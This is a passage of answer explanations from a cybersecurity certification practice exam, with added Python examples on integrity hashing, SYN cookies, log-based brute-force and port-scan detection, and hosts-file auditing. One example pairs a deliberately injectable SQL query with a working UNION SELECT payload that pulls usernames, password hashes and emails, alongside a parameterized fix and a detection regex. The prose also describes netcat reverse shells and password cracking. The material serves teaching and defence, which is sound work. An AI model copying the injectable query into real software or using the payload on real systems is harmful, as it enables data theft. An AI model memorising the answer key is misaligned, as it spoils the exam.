B. Of these answers, only Shodan provides a searchable listing of vulnerable hosts includ- 
ing details of the system that was scanned. OpenVAS, CVE, and nmap do not provide 
central databases of vulnerable systems. 


C. Netcat can act as a relay, file transfer tool, reverse shell, TCP banner grabber, TCP 
port scanner, and in a multitude of other roles, but it does not include encryption capabili- 
ties. If Adam needs to encrypt his data, he will need another tool to perform that task. 


A. Wireshark can be used to capture network traffic, allowing you to review traffic 
information to build a network topology based on time to live, IP addresses, and other 
information. nmap and SolarWinds Network Mapper both rely on active scans to generate 
topologies, and Nessus does not provide a network topology generation capability. 


C. Google dorks are advanced search strings that can help locate information that is oth- 
erwise difficult to find. They can be used to find things like SQL injection, login pages, 
links, domain-specific information, and a host of other data. 


A. A review of operational controls will often look at change management, separation 
of duties and other personnel controls, and process-based controls. Many administrative 
controls are part of an operational control review. These are sometimes conducted as Ser- 
vice Organization Control (SOC) audits with SOC 1, 2, and 3 reports generated depend- 
ing on the level and depth of the assessment. 


B. Olivia’s first action should be to contact the device administrator. There is no indica- 
tion that the device has been compromised, and logging in to validate the finding is not 
typically part of a reconnaissance process. 


B. Tripwire and similar programs are designed to monitor a file for changes and to report 
on changes that occur. They rely on file fingerprints (hashes) and are designed to be reli- 
able and scalable. Kathleen’s best bet is to use a tool designed for the job, rather than to 
try to write her own. 


B. The best option in this list for Selah’s purposes is theHarvester. It combines search 
engine-based searches with Shodan and other data sources to gather email addresses, 
subdomain information, employee names, and a variety of other types of useful footprint- 
ing data. Nmap is useful for port scanning but typically won’t find email addresses and 
employee names, Shodan is a vulnerability search engine, and osint-ng is a made-up tool 
name. 


B. ESP packets are part of the IPsec protocol suite and are typically associated with a 
tunnel or VPN. Ryan should check for a VPN application and determine what service or 
system the user may have connected to. 


D. The strings command extracts runs of printable characters from files, allowing 
Ben to quickly determine the contents of files. grep would require knowing what he is 
looking for, and either the more or less command will simply display the file, which is 
often not a useful strategy for binaries. 


B. Changing the hosts file has been used by various malware packages to prevent updates 
by pointing the antivirus vendor’s update server hostname at a bogus address, so that DNS 
is never consulted. Lauren should check to see whether the antivirus on the system is 
up-to-date but will probably need to recommend a rebuild or reinstallation of the system. 


B. Alice’s suspicious user appears to be attempting to crack LANMAN hashes using a 
custom word list. The key clues here are the john application, the LM hash type, and the 
location of the word list. 


C. nmap’s Common Platform Enumeration is a standardized way to name applications, 
operating systems, and hardware. CPE output starts with cpe:/a for applications, cpe:/h for 
hardware, and cpe:/o for operating systems. 


D. Detecting port scans requires the ability to identify scanning behavior, and the appli- 
cations that create syslog entries on most default Linux distributions are not set up for 
this. Charles should identify a tool like psad, an IDS package, or other tool that can track 
connections and scan behavior and report on it and then use syslog to send those messages 
to his log collector or SIEM. 


C. To show current NetBIOS sessions and their status, Alex can issue the nbtstat -s 
command. The -c flag shows the NetBIOS name cache, while the -r flag displays 
the count of NetBIOS names resolved through a WINS server query and by broadcast. 
There is no -o flag. 


D. The service running from the ww directory as the user apache should be an immedi- 
ate indication of something strange, and the use of webmin from that directory should also 
be a strong indicator of something wrong. Lucas should focus on the web server for the 
point of entry to the system and should review any files that the Apache user has created 
or modified. If local vulnerabilities existed when this compromise occurred, the attacker 
may have already escalated to another account! 


D. The passwd binary stands out as having recently changed. This may be innocuous, 
but if Angela believes the machine was compromised, there is a good chance the passwd 
binary has been replaced with a malicious version. She should check the binary against a 
known good version and then follow her incident response process if it doesn’t match. 
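
The hash-based check that both the Tripwire answer (Kathleen) and this passwd answer (Angela) rely on, as an added example that is not from the book: build a baseline of file digests for a tree, then compare the tree against that baseline and report modified, added, and removed files. The demo creates a constructed temporary directory with a fake passwd binary, baselines it, then tampers with it; nothing outside the temporary directory is touched.

```python
"""Hash-based file integrity baseline and check, Tripwire-style (added example, not from the book)."""
import hashlib
import os
import shutil
import tempfile


def file_digest(path, algo="sha256"):
    """Stream the file through the hash so large binaries do not need to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, algo="sha256"):
    """Map every regular file under root (path relative to root, '/'-separated) to its digest."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and special files are tracked separately in real tools
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = file_digest(full, algo)
    return baseline


def check_integrity(root, baseline, algo="sha256"):
    """Compare the live tree against the baseline; returns sorted lists per change type."""
    current = build_baseline(root, algo)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a fake bin/, then replace passwd, add a file, delete ls."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    try:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "passwd"), "wb") as f:
            f.write(b"\x7fELF original passwd")
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"\x7fELF ls")
        baseline = build_baseline(root)          # taken while the system is known good
        with open(os.path.join(root, "bin", "passwd"), "wb") as f:
            f.write(b"\x7fELF trojaned passwd")   # attacker swaps the binary
        with open(os.path.join(root, "bin", ".rootkit"), "wb") as f:
            f.write(b"evil")                      # and drops a new file
        os.remove(os.path.join(root, "bin", "ls"))
        return check_integrity(root, baseline)
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

The baseline only has value if it is stored where the attacker cannot rewrite it (off-host or signed), and if the hashing tool itself is trusted: on a compromised box, checking a binary with that same box's sha256sum proves little, which is why Angela should compare against a known good copy from distribution media or a package repository.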


A. Using SYN cookies allows a server to act as though its SYN queue is larger than it is, 
reducing or completely preventing the issues encountered during a SYN flood. Instead of 
queuing state for each half-open connection, the server encodes the connection details in 
the initial sequence number of its SYN-ACK and waits for the client’s final ACK; a legitimate 
client’s ACK lets it reconstruct the connection, while spoofed SYNs cost it no memory at 
all. Of course, SYN cookies do nothing against DoS attacks that go further than a SYN flood! 
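
The mechanism in simplified form, as an added example that is not from the book: the server's initial sequence number carries a coarse time counter, an index into a small MSS table, and a 24-bit keyed hash of the connection tuple. On the final ACK the server recomputes the hash from the packet headers alone, so no per-connection state is needed while the handshake is pending. The secret, addresses, ports and layout here are constructed for the example; the Linux kernel's real layout differs in detail.

```python
"""Simplified SYN cookie generation and verification (added example, not from the book)."""
import hashlib
import hmac
import struct
import time

MSS_TABLE = (536, 1220, 1460, 8960)   # the only MSS values that survive; index fits in 2 bits


def _hash24(secret, saddr, daddr, sport, dport, counter):
    """Keyed 24-bit hash over the connection tuple and the time counter."""
    msg = struct.pack("!4s4sHHI", saddr, daddr, sport, dport, counter)
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(secret, saddr, daddr, sport, dport, client_isn, mss, now=None):
    """Return the server ISN to put in the SYN-ACK; nothing is stored for this connection."""
    if now is None:
        now = int(time.time())
    counter = (now // 64) & 0x1f                       # 5-bit counter, 64-second ticks
    mss_idx = max([i for i, m in enumerate(MSS_TABLE) if m <= mss] or [0])
    h = _hash24(secret, saddr, daddr, sport, dport, counter)
    cookie = (counter << 27) | (mss_idx << 24) | h    # bit 26 unused
    return (cookie + client_isn) & 0xffffffff


def check_cookie(secret, saddr, daddr, sport, dport, client_isn, ack, now=None, max_age=128):
    """Validate the handshake's final ACK. Returns the negotiated MSS, or None if the
    cookie is forged, was issued for a different tuple, or is older than max_age seconds."""
    if now is None:
        now = int(time.time())
    cookie = (ack - 1 - client_isn) & 0xffffffff      # ack acknowledges server_isn + 1
    counter = cookie >> 27
    mss_idx = (cookie >> 24) & 0x3
    h = cookie & 0xffffff
    age_ticks = (((now // 64) & 0x1f) - counter) & 0x1f
    if age_ticks * 64 > max_age:
        return None                                   # stale: replayed or very slow client
    if h != _hash24(secret, saddr, daddr, sport, dport, counter):
        return None                                   # wrong tuple or guessed cookie
    return MSS_TABLE[mss_idx]
```

The trade-off is visible in the code: anything the SYN carried that is not encoded in the cookie (window scaling, SACK, timestamps in the simplest scheme) is lost, and 24 bits of hash are enough to make guessing impractical at line rate but not enough to call it cryptographic authentication.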


B. As attacks succeed, they will often create additional opportunities for discovery, result- 
ing in more attacks. Planning the test itself, as well as the final reporting phase, should 
occur only once per penetration test. 


D. Geoff’s only sure bet to prevent these services from being accessed is to put a network 
firewall in front of them. Many appliances enable services by default; since they are appli- 
ances, they may not have host firewalls available to enable. They also often don’t have 
patches available, and many appliances do not allow the services they provide to be dis- 
abled or modified. 


B. Exiftool provides access to image and document metadata, including information 
about the camera, geotagging, time and date information, and a variety of other useful 
metadata if it is present. Strings is useful for pulling text from files but does not provide 
usefully formatted metadata. Wireshark is a packet capture utility, and stegdetect is used 
to detect steganographically concealed data in files. 
A. The at command can be used to schedule Windows tasks. This task starts netcat as 
a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Lauren 
should be concerned, as this allows traffic in that otherwise might be blocked! 


C. Using self-signed certificates for services that will be used by the general public or 
organizational users outside of a small testing group can be an issue because they will 
result in an error or warning in most browsers. The TLS encryption used for HTTPS 
will remain just as strong regardless of whether the certificate is provided by a certificate 
authority or self-signed, and a self-signed certificate cannot be revoked at all! 


A. The net use command will list any network shares that the workstation is using, 
allowing Isaac to identify file servers or others with file sharing that the workstation is 
configured to use. net user will show user accounts for the local PC, net group is only 
usable on domain controllers, and net config allows the server and workstation services 
to be controlled. 


A. Pretexting is a form of social engineering that relies on lies about the social engineer’s 
motives. In this case, Fred is giving his targets reasons to believe he is legitimately a mem- 
ber of the organization’s support team. OSINT refers to open source intelligence, which is 
data gathered from public sources. A tag-out sometimes refers to handing off to another 
member of a penetration test team, while profiling is conducted while gathering informa- 
tion about an individual, team, or organization before conducting a social engineering 
attack. 


D. The uses described for the workstation that Geoff is securing do not require inbound 
access to the system on any of these ports. Web browsing and Active Directory domain 
membership traffic can be handled by traffic initiated by the system. 


B. Network flows can be used to identify traffic patterns between systems that are atypi- 
cal or that connect to systems that are known malware or malicious sites. Using his SIEM, 
Lucca can look for top talkers, behavior or trend-based anomalies, or other correlations 
that point to an issue. 


A. Automated shunning, whether via an IPS or other technology, can block attackers but 
can also prevent penetration testers from being able to conduct scans or attacks. When 
planning a white-box penetration test, it is typical to discuss the presence of technologies 
that may block or limit the test and to either work around them or to disable them for the 
tester’s IP addresses if they are not directly in scope. 


C. While the first three ports are common to many of the devices listed, TCP 515 is the 
LPR/LPD port, 631 is the IPP port commonly used by many print servers, and TCP 9100 is 
the RAW, or direct, IP printing port. While this could be another type of device, it is most 
likely a network-connected printer. 


D. Cassandra should report that password hashes, user files, and domain details may 
have been exposed. Windows does not store plain-text Windows account passwords, so 
this should not be a concern unless the administrator keeps them in a file! 
B. Windows 10 has quite a few built-in options for reboots after patches, but if users are 
logged in and a forced restart is not set via Group Policy, patches may not be installed 
for a very long time. Lauren should work with system administrators and user groups to 
ensure that a reasonable reboot policy can be put into place. 


D. While application sharding and query optimization can help services respond under 
heavy loads, Jarett’s best bet is to work with a content distribution network (CDN) that 
has built-in DDoS mitigation technologies. This will allow his content to be accessible 
even if his primary service is taken offline and will spread the load to other servers dur- 
ing attacks, even if the CDN’s anti-DDoS capabilities can’t entirely mitigate the attack. 
Aggressive aging can help when implemented on a firewall and may help somewhat with 
survivability but is less useful for large-scale DDoS attacks. 


B. The system is showing normal ports for a Windows file server. It is most likely that 
Frank’s escalation to management resulted in action by the server administrator. 


C. Using telnet to connect to remote services to validate their response is a useful tech- 
nique for service validation. It doesn’t always work but can allow you to interact with the 
service to gather information manually. 


C. If this Google search returns information, it will show MySQL connection informa- 
tion, including passwords. Adam should immediately report this finding to management 
and should recommend that all exposed passwords be changed immediately and that the 
misconfiguration that resulted in the files being exposed should be fixed, and the reason it 
occurred should be identified. This does not tell you whether MySQL services are exposed 
remotely and does not mean that an incident has already occurred. At this point, Adam 
only knows that a misconfiguration has occurred. Changing all of the connection strings 
won’t fix the root issue. 


A. Extended Validation (EV) certificates require additional action to validate that the 
requester’s legal identity is known, as well as the operational and physical presence of 
the website owner. In addition, the requesting organization has to prove that the domain 
owner has control over the domain name and that the person requesting the certificate has 
the authority to do so. Finally, they require a signature requirement for an authorized offi- 
cer of the company. DV certificates require only proof of control over the domain name, 
OV certificates add validation of the requesting organization’s identity on top of domain 
control, and IV certificates are made up for this question. 


C. Attackers often use built-in editing tools that are inadvertently or purposefully 
exposed to edit files to inject malicious code. In this case, someone has attempted to 
modify the 404 file displayed by WordPress. Anybody who received a 404 error from this 
installation could have been exposed to malicious code inserted into the 404 page or sim- 
ply a defaced 404 page. 


C. This shows an attempted SQL injection attack. The query reads 17 UNION SELECT 0 
and then looks for the username, user ID, password, and email from the users table. 
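
The attack in this answer, run end to end as an added example that is not from the book: a lookup that pastes the request parameter into the SQL text, the same lookup with a bound parameter, a payload shaped like the one in the question, and a small heuristic an analyst can run over request parameters to spot this class of probe. The schema, rows and password hash are constructed for the example; SQLite is used so the block runs without a server.

```python
"""UNION-based SQL injection beside the parameterized fix, with a log-side heuristic
(added example, not from the book)."""
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Constructed demo schema: the products table the page queries, the users table the attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO products VALUES (17, 'widget', '9.99');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.com');
    """)
    return conn


def product_vulnerable(conn, product_id):
    """The bug: user input becomes part of the SQL text, so it can change the query's structure."""
    sql = "SELECT id, name, price FROM products WHERE id = %s" % product_id
    return conn.execute(sql).fetchall()


def product_safe(conn, product_id):
    """The fix: a bound parameter is always a value, never SQL, whatever it contains."""
    return conn.execute("SELECT id, name, price FROM products WHERE id = ?", (product_id,)).fetchall()


# Payload shaped like the one in the question; three columns to match the SELECT it is appended to.
PAYLOAD = "17 UNION SELECT username, password, email FROM users"

# Heuristic for request parameters; noisy on free text, good enough for triage of query strings.
SQLI_PATTERN = re.compile(
    r"\bunion\b\s+(all\s+)?select\b"            # UNION SELECT
    r"|'\s*or\s+'?\d+'?\s*=\s*'?\d+"            # ' OR 1=1, ' OR '1'='1
    r"|--|/\*"                                 # comment terminators
    r"|;\s*(drop|insert|update|delete)\b",      # stacked statement
    re.I)


def looks_like_sqli(raw_value):
    """Check a request parameter after URL-decoding it, since web logs store it encoded."""
    return bool(SQLI_PATTERN.search(unquote_plus(raw_value)))
```

With the payload, the vulnerable version returns the widget row plus the admin's hash and email; the safe version compares the whole string against the integer column and returns nothing.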
B. nmap can combine operating system identification and time to live to take a reasonable 
guess at the number of hops in the network path between the scanner and a remote sys- 
tem. The operating system guess will provide the base time to live, and the TTL counter 
will decrement at each hop. Given these two pieces of information, nmap takes an edu- 
cated but often very accurate guess. 


B. Studies have shown that 87 percent of the U.S. population can be uniquely identified 
with their date of birth, gender, and ZIP code. If Charles can obtain this information, he 
has a very high chance of identifying the right individual. 


B. The -l flag is a key hint here, indicating that netcat was set up as a listener. Any con- 
nection to port 43501 will result in example.zip being sent to the connecting application. 
Typically, a malicious user would then connect to that port using netcat from a remote 
system to download the file. 


D. This scan shows Bob that he is likely on a network using some portion of the 
10.0.0.0/8 private IP space. An initial scan of the 10.0.2.0/24 network to determine what 
is near him would be a good start. Since the Zenmap scan was run to a single exter- 
nal host, it will not show other hosts on the local network, so there may be more than 
two nodes on the network. Bob cannot make determinations about what the host at 
96.120.24.121 is, beyond a device on the route between the local host and his remote scan 
destination. 


B. Repeated failures from the same host likely indicate a brute-force attack against the 
root account. 
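
The detection behind this answer, as an added example that is not from the book: parse sshd lines from an auth log, count failures per source address in a sliding window, alert when the count reaches a threshold, and raise a second, louder alert if the same source then succeeds, since that is the case where the brute force may have worked. The log lines are constructed for the example, and the year is assumed because syslog timestamps do not carry one.

```python
"""Brute-force detection over sshd auth log lines (added example, not from the book)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt: a burst against root from one host, then a success, plus benign noise.
AUTH_LOG = """\
May  3 10:14:02 bastion sshd[2211]: Failed password for root from 198.51.100.23 port 51432 ssh2
May  3 10:14:04 bastion sshd[2213]: Failed password for root from 198.51.100.23 port 51440 ssh2
May  3 10:14:05 bastion sshd[2215]: Failed password for invalid user oracle from 198.51.100.23 port 51446 ssh2
May  3 10:14:07 bastion sshd[2217]: Failed password for root from 198.51.100.23 port 51452 ssh2
May  3 10:14:09 bastion sshd[2219]: Failed password for root from 198.51.100.23 port 51460 ssh2
May  3 10:14:11 bastion sshd[2221]: Accepted password for root from 198.51.100.23 port 51466 ssh2
May  3 10:20:30 bastion sshd[2300]: Failed password for alice from 10.0.2.15 port 40100 ssh2
May  3 10:25:00 bastion sshd[2310]: Accepted publickey for alice from 10.0.2.15 port 40102 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")


def parse_auth_log(text, year=2024):
    """Return [(timestamp, 'Failed'|'Accepted', user, ip)] for sshd auth lines; year is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
        events.append((ts, m.group("result"), m.group("user"), m.group("ip")))
    return events


def detect_bruteforce(events, threshold=5, window_s=60):
    """Alert once per source when failures inside a sliding window reach the threshold,
    and again if that source later authenticates successfully."""
    recent = defaultdict(list)   # ip -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for ts, result, user, ip in events:
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.pop(0)
            if len(q) >= threshold and ip not in flagged:
                alerts.append(("brute-force", ip, len(q)))
                flagged.add(ip)
        elif result == "Accepted" and ip in flagged:
            alerts.append(("success-after-bruteforce", ip, user))
    return alerts
```

Per-source counting is the simple case; a distributed attack that spreads attempts over many addresses needs the same window applied per target account instead.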


C. This Google dork relies on log files being inadvertently exposed for a site. If the 
authentication logs are exposed, this will show lists of failed logins, along with login 
paths, possibly providing Charles with a useful list of usernames. He can then leverage 
that list by attempting logins, by gathering further information on the users, or by using 
social engineering. 


B. This type of probe is known as domain harvesting and relies on message rejec- 
tion error messages to help the individual running the probe to determine which email 
accounts actually exist. Rick may want to disable delivery receipts, disable nondeliverable 
responses, or investigate more advanced techniques like false nondeliverable responses or 
recipient filtering and tar pitting. 


B. SIEM systems typically provide alerting, event and log correlation, compliance data 
gathering and reporting, data and log aggregation, and data retention capabilities. This 
also means that they can be used for forensic analysis as they should be designed to pro- 
vide a secure copy of data. They do not typically provide performance management-spe- 
cific capabilities. 


C. Relying on hashing means that Charles will only be able to identify the specific ver- 
sions of malware packages that have already been identified. This is a consistent problem 
with signature-based detections, and malware packages commonly implement polymor- 
phic capabilities that mean that two instances of the same package will not have identical 
hashes because of changes meant to avoid signature-based detection systems. 
B. Lauren’s best option from this list is to query WHOIS for the domain and its IP alloca- 
tion. She might also choose to use a BGP looking glass, but most of the information she will 
need will be in WHOIS. If she simply scans the network the web server is in, she may end 
up scanning a third-party hosting provider, or other systems that aren’t owned by her 
organization in the /24 subnet range. Contacting ICANN isn’t necessary with access to 
WHOIS, and depending on what country Lauren is in, ICANN may not have the data she 
wants. Finally, using traceroute will only show the IP address of the system she queries; she 
needs more data to perform a useful scan in most instances. 


C. Most data center firewalls are configured to only allow the ports for publicly accessible 
services through to other networks. Location C is on an internal network, so Lauren will 
probably see more ports than if she tried to scan data center systems from location A, but 
it is likely that she will see far fewer ports than a portscan of the data center from inside 
the data center firewall will show. 


B. Lauren will see the most important information about her organization at location B, 
which provides a view of data center servers behind the data center firewall. To get 
more information, she should request that the client network firewall ruleset include a 
rule allowing her scanner to scan through the firewall to all ports for all systems on all 
protocols. 


A. Since Andrea is attempting to stop external scans from gathering information about 
her network topology, the firewall is the best place to stop them. A well-designed ruleset 
can stop, or at least limit, the amount of network topology information that attackers can 
collect. 


C. This is an example of pretexting, which relies on creating a scenario that the victim 
will believe, resulting in the attacker gaining access. Baiting uses an item or something 
that the user desires to cause them to fall for a phishing style attack. Quid pro quo prom- 
ises a benefit in exchange for information, and whaling is a phishing attack specifically 
aimed at important users. 


B. The three objectives of cybersecurity are confidentiality, integrity, and availability. 
Hashing and the use of integrity monitoring tools like Tripwire are both techniques used 
to preserve integrity; in fact, file integrity monitoring tools typically use hashing to verify 
that files remain intact and unchanged. 


C. Random or deterministic sampling can help Sam’s team capture usable flows despite 
not being able to handle the full throughput of their network. Random sampling will 
capture a random packet out of every n packets, with n set by the user. Deterministic sam- 
pling simply takes every nth packet that passes through, so Sam might sample the 1st, 
11th, 21st, and so on. This means that small flows may be missed, but in this case, sam- 
pling half of all packets is still possible, meaning most flows will still be captured. 


B. Whaling is a term used to specifically denote phishing attacks aimed at high-ranking 
officers of a company. Spear phishing describes phishing messages apparently sent by an 
individual or organization that the recipient is familiar with and leverages trust in that 
organization. Neither tuna phishing nor SAML phishing are industry terms. 
C. Brandon should select RIPE, the regional Internet registry for Europe, the Middle 
East, and parts of Central Asia. AFRINIC serves Africa, APNIC serves the Asia/Pacific 
region, and LACNIC serves Latin America and the Caribbean. 


B. netstat can be used to list listening ports. The -l flag displays listening ports, while 
-t limits it to TCP ports. As you might expect, -u works for UDP ports. 


B. Lauren can determine only that the default administrative shares are enabled. While 
administrative shares are useful for remote administration, they can pose a threat for sys- 
tems that do not require them, and some security baselines suggest disabling them in the 
registry if they are not used. 


C. Greg is seeing a significant increase in network latency for the host he is scanning, 
which could result in performance issues for users of the server. Greg needs to slow down 
his scan, which can be accomplished by reducing the number of concurrent scans. 


C. A mandatory access control system relies on the operating system to constrain what 
actions or access a subject can perform on an object. Role-based access control uses roles 
to determine access to resources, and discretionary access control allows subjects to con- 
trol access to objects that they own or are responsible for. Level-based access control is a 
type of role-based access control. 


B. Testing for common sample and default files is a common tactic for vulnerability 
scanners. Janet can reasonably presume that her Apache web server was scanned using a 
vulnerability scanner. 


B. Charles should immediately notice that all traffic comes from one host (10.100.25.14) 
and is sent to the same host (10.100.18.12). All the traffic shown is TCP SYNs to well- 
known ports. Charles should quickly identify this as a SYN-based port scan. 


A. Susan’s best option is to submit the file to a tool like VirusTotal, which will scan it 
for virus-like behaviors and known malware tools. Checking the hash by using either a 
manual check or by using the National Software Reference Library can tell her if the file 
matches a known good version but won’t tell her if it includes malware. Running a suspect 
file is the worst option on the list! 


A. The U.S. Department of Defense’s Trusted Foundry program is intended to ensure the 
integrity and confidentiality of integrated circuits throughout the design and manufacturing 
life cycle while retaining access to leading-edge technology for trusted and untrusted uses. 


C. TCP port 22 indicates that this is most likely an SSH scan, and the single packet with no 
response traffic indicates unsuccessful connection attempts. If the system is not normally 
used for scanning for open SSH servers, Alice should look into why it is behaving this way. 
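
The scan detection that the psad answer (Charles), the SYN port scan answer (Charles again) and this SSH answer (Alice) all turn on, as an added example that is not from the book: parse iptables LOG lines, keep only bare SYNs, and flag a source that probes many ports on one host (a vertical scan, like 10.100.25.14 above) or the same port on many hosts (a horizontal scan, like a host sweeping for SSH). The log lines are generated in the kernel's LOG format from constructed addresses; the thresholds are assumptions to tune per network.

```python
"""Port scan detection over iptables LOG lines (added example, not from the book)."""
import re
from collections import defaultdict

FIELD = re.compile(r"\b(SRC|DST|PROTO|DPT)=(\S+)")
TCP_FLAGS = re.compile(r"\b(SYN|ACK|RST|FIN|PSH|URG)\b")   # URGP=0 does not match \bURG\b


def make_line(src, dst, dport, flags="SYN", sport=44321):
    """Construct a line in the iptables LOG target's format (sample data, not a real capture)."""
    return ("Mar 10 14:02:11 gw kernel: [1234.5678] IN=eth0 OUT= "
            "MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=%s DST=%s LEN=60 TOS=0x00 "
            "PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=%d DPT=%d WINDOW=29200 RES=0x00 %s URGP=0"
            % (src, dst, sport, dport, flags))


def parse_syn(line):
    """Return (src, dst, dport) for a bare SYN, i.e. a new connection attempt; None otherwise."""
    fields = dict(FIELD.findall(line))
    if fields.get("PROTO") != "TCP" or "DPT" not in fields:
        return None
    flags = set(TCP_FLAGS.findall(line))
    if "SYN" not in flags or "ACK" in flags:      # SYN-ACK replies are not probes
        return None
    return fields["SRC"], fields["DST"], int(fields["DPT"])


def detect_scans(lines, port_threshold=10, host_threshold=10):
    """Vertical: one source hits >= port_threshold distinct ports on one destination.
    Horizontal: one source hits the same port on >= host_threshold distinct destinations."""
    ports_by_pair = defaultdict(set)       # (src, dst)   -> {dport}
    hosts_by_src_port = defaultdict(set)   # (src, dport) -> {dst}
    for line in lines:
        parsed = parse_syn(line)
        if parsed is None:
            continue
        src, dst, dport = parsed
        ports_by_pair[(src, dst)].add(dport)
        hosts_by_src_port[(src, dport)].add(dst)
    alerts = []
    for (src, dst), ports in ports_by_pair.items():
        if len(ports) >= port_threshold:
            alerts.append(("vertical", src, dst, len(ports)))
    for (src, dport), dsts in hosts_by_src_port.items():
        if len(dsts) >= host_threshold:
            alerts.append(("horizontal", src, dport, len(dsts)))
    return sorted(alerts, key=lambda a: (a[0], a[1], str(a[2])))


# Constructed log: a 12-port scan of one host, a 12-host sweep for SSH, and one ordinary connection.
SAMPLE_LOG = (
    [make_line("10.100.25.14", "10.100.18.12", p)
     for p in (21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389)]
    + [make_line("10.0.2.15", "10.0.3.%d" % i, 22) for i in range(1, 13)]
    + [make_line("10.0.2.20", "10.0.2.50", 80),                              # normal client SYN
       make_line("10.0.2.50", "10.0.2.20", 51000, flags="ACK SYN", sport=80)]  # its SYN-ACK
)
```

The kernel only logs what a LOG rule matches, so this needs a rule that logs new inbound and outbound SYNs (rate-limited) before the default policy; without it the syslog stream carries nothing for a tool like this or psad to read.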


B. If Chris can perform a zone transfer, he can gather all of the organization’s DNS infor- 
mation, including domain servers, host names, MX and CNAME records, time to live 
records, zone serial number data, and other information. This is the easiest way to gather 
the most information about an organization via DNS if it is possible. Unfortunately, for 
penetration testers (and attackers!), few organizations allow untrusted systems to perform 
zone transfers. 
A. Luke knows that Social Security number breaches are regulated in most states in the 
United States and that this means his organization has experienced a regulated informa- 
tion breach. He will now most likely have to take actions as required by law in the states 
in which they have nexus. 


C. Chris is performing a type of social media profiling. While common usernames may 
not tell him very much, unique usernames or those commonly used by a specific target can 
help him gather more information about the sites his targets use. 


C. Performing a WHOIS query is the only passive reconnaissance technique listed. Each 
of the other techniques performs an active reconnaissance task. 


A. Passive network mapping can be done by capturing network traffic using a sniffing 
tool like Wireshark. Active scanners including nmap, the Angry IP Scanner, and netcat 
(with the -z flag for port scanning) could all set off alarms as they scan systems on the 
network. 


B. Multifactor authentication helps reduce the risk of a captured or stolen password by 
requiring more than one factor to authenticate. Attackers are less likely to have also stolen 
a token, code, or biometric factor. 


B. AAAA records are IPv6 address records. This means that Chris may also want to scan 
for hosts that are available via IPv6 gateways. The rest of the answers here are made up 
for this question. 


D. TheHarvester is an email collection tool that can automatically gather email addresses 
from a domain, website, or other source. nmap does not provide an email-gathering capa- 
bility, cree.py is a geolocation tool, and MailSnarf was made up for this question. 


B. Zenmap topologies show a number of pieces of useful information. The icons next to 
DemoHost2 show the following information: a relative assessment of how many ports are 
open, with white showing “not scanned,” green showing less than three open ports, yel- 
low showing three to six open ports, and red showing more than six open ports. Next, it 
shows a firewall is enabled, and finally the lock icon shows that some ports are filtered. 

In this scan, only DemoHost2 has been identified by nmap as currently running a firewall, 
which doesn’t mean that other hosts are not actually running firewalls! 


B. It is critical to determine when a penetration test will occur and what systems, net- 
works, personnel, and other targets are part of the test and which are not. In addition, 
testers must have the proper permission to perform the test. The content and format of the 
summary are important but not critical to have in place before the penetration test occurs. 


B. This capture shows SQL injection attacks being attempted. Since this is the reconnais- 
sance phase, the red team should not be actively attempting to exploit vulnerabilities and 
has violated the rules of engagement. 


A. TCP port 636 is often used for secure LDAP, and secure HTTP typically uses TCP 
443. While other services could use these ports, Jennifer’s best bet is to presume that they 
will be providing the services they are typically associated with. 
B. Lauren has added an entry to the hosts file that routes all traffic for example.com to 
her local address. This is a useful technique to prevent a system from contacting a mali- 
cious host or domain or to simply prevent a nontechnical user from visiting specific sites 
or domains. 
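
The two sides of this technique, the defensive sinkhole in this answer and the malware-style update block in the earlier antivirus answer, distinguished by a hosts file audit, as an added example that is not from the book: parse the file the way the resolver does (comments stripped, one address followed by one or more names), then flag any watched update or security domain that is overridden locally, and separately list ordinary names that are pointed at loopback or 0.0.0.0, which may be a deliberate sinkhole but deserves a second look. The hosts file and the watched-domain list are constructed for the example.

```python
"""Audit a hosts file for update hijacks and sinkhole entries (added example, not from the book)."""
import ipaddress

# Constructed hosts file: standard entries, an admin sinkhole, and a suspicious AV-update override.
HOSTS_FILE = """\
# Standard entries
127.0.0.1       localhost
::1             localhost
# Admin-added sinkhole for a known bad domain
0.0.0.0         malicious.example.net
# Suspicious: AV update server pointed at loopback
127.0.0.1       update.antivirus-vendor.example   # added by ???
10.0.0.5        intranet.example.com
"""

# Domains an analyst never expects to see overridden on a workstation (assumed list for the example).
WATCHED_SUFFIXES = ("antivirus-vendor.example", "windowsupdate.com", "update.microsoft.com")


def parse_hosts(text):
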